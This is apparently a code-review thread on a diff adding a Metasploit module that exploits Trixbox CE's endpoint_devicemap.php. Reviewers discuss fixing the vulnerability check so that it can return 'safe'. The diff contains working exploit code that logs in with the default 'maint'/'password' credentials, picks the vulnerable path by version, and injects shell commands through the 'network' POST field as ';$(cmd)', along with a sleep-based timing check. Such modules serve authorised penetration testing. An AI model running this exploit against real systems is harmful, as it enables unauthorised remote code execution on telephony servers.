modules/exploits/unix/webapp/trixbox_ce_endpoint_devicemap_rce.rb

```diff
@@ -0,0 +1,161 @@
+              'Type' => :unix_memory
+            ]
+          ],
+        'Privileged' => false,
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        OptString.new('HttpUsername', [ true, 'User to login with', 'maint']),
+        OptString.new('HttpPassword', [ true, 'Password to login with', 'password']),
+      ]
+    )
+  end
+
+  def user
+    datastore['HttpUsername']
+  end
+
+  def pass
+    datastore['HttpPassword']
+  end
+
+  def get_target(res)
+    version = res.body.scan(/v(\d\.\d)/).flatten.first
+    print_good("#{peer} - Trixbox CE v#{version}.x identified.")
+    if Gem::Version.new(version).between?(Gem::Version.new('2.6'), Gem::Version.new('2.8'))
+      @uri = normalize_uri(target_uri.path, '/maint/modules/endpointcfg/endpoint_devicemap.php')
+    elsif Gem::Version.new(version).between?(Gem::Version.new('2.0'), Gem::Version.new('2.4'))
+      @uri = normalize_uri(target_uri.path, '/maint/modules/11_endpointcfg/endpoint_devicemap.php')
+    elsif Gem::Version.new(version) == Gem::Version.new('1.2')
+      @uri = normalize_uri(target_uri.path, '/maint/endpoint_devicemap.php')
+    else
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
+    end
+  end
+
+  def login(user, pass, _opts = {})
+    uri = normalize_uri(target_uri.path, '/maint/')
+    print_status("#{peer} - Authenticating using \"#{user}:#{pass}\" credentials...")
+    res = send_request_cgi({
+      'uri' => uri,
+      'method' => 'GET',
+      'authorization' => basic_auth(user, pass),
+      'vars_get' => {
+        'lang' => 'english'
+      }
+    })
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed.')
+    end
+    if res.code == 200
+      print_good("#{peer} - Authenticated successfully.")
+      return res
+    else
+      fail_with(Failure::NoAccess, 'Authentication failed.')
+    end
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, 'Connection failed.')
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'authorization' => basic_auth(user, pass),
+      'vars_get' => {
+        'lang' => 'english'
+      },
+      'vars_post' => {
+        'network' => ";$(#{cmd})"
+      }
+    })
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, 'Connection failed.')
+  end
+
+  def check
+    res = login(user, pass)
+    get_target(res)
+    delay = rand(10...20)
+    cmd = "sleep #{delay}"
+    print_status("#{peer} - Verifying remote code execution using '#{cmd}' command...")
+    t1 = Time.now.to_i
+    res = execute_command(cmd)
+    t2 = Time.now.to_i
+    unless res
+      vprint_error 'Connection failed.'
+      return CheckCode::Detected
+    end
+    diff = t2 - t1
+    if diff >= delay
+      print_good("#{peer} - Response received after #{diff} seconds.")
+      return CheckCode::Vulnerable
+    end
```

Comment:
Uhhhhh where is the part where we return `CheckCode::Safe`? This code will always state that the target is vulnerable given how you have programmed it at the moment.

Reply:
smth like that?
```
    if diff >= delay
      print_good("#{peer} - Response received after #{diff} seconds.")
      return CheckCode::Vulnerable
    else
      return CheckCode::Safe
    end
```

Reply:
Yep that works here, given by this point we have verified the target and that we can communicate with it, so either it should be vulnerable to the exploit, or it should not. This is the point were we verify this so the `else` case should handle the case where the `diff`, or noticed delay, is not as long as we expected.

TLDR: Yep this is exactly what I am looking for.

Reply:
Confirmed fixed.